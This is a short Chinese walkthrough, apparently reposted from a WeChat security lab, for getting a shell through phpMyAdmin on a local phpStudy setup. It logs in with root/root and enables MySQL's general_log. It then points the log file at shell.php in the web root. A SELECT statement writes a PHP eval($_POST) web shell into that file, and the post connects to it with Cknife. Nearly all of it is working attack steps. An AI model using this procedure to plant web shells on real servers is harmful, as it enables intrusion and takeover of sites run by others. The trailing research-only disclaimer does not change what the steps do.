漏洞环境
链接:https://pan.baidu.com/s/12vHWmcStDlgYc863ZBIktQ
提取码:c7n6
漏洞危害
Get shell
漏洞复现
环境下载完成,默认安装即可,访问phpmyadmin页面,输入root/root进入后台。
复现此漏洞的前提是general_log_file要开启,因为这个会保存所有的查询语句,默认是关闭的,执行SQL语句查看:
show variables like'general_log';
执行SQL语句把它开启:
set global general_log=on;
再次查看是否被开启
已被开启,开启之后,查看网站在什么位置,设置shell路径
利用phpmyadmin的log变量查找网站根目录信息
写入shell文件
SET global general_log_file='D:/phpStudy/WWW/shell.php';
这时访问shell文件是什么都没有的。
因为还没有执行查询语句所以没有记录,直接执行SQL语句
SELECT'eval($_POST["zjt"]); '; @
再次访问shell文件就有记录了
Shell地址http://localhost:81/shell.php
口令zjt
使用Cknife连接成功
原文始发于微信公众号(赛瑞攻防实验室):phpmyadmin getshell漏洞复现
特别标注:
本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论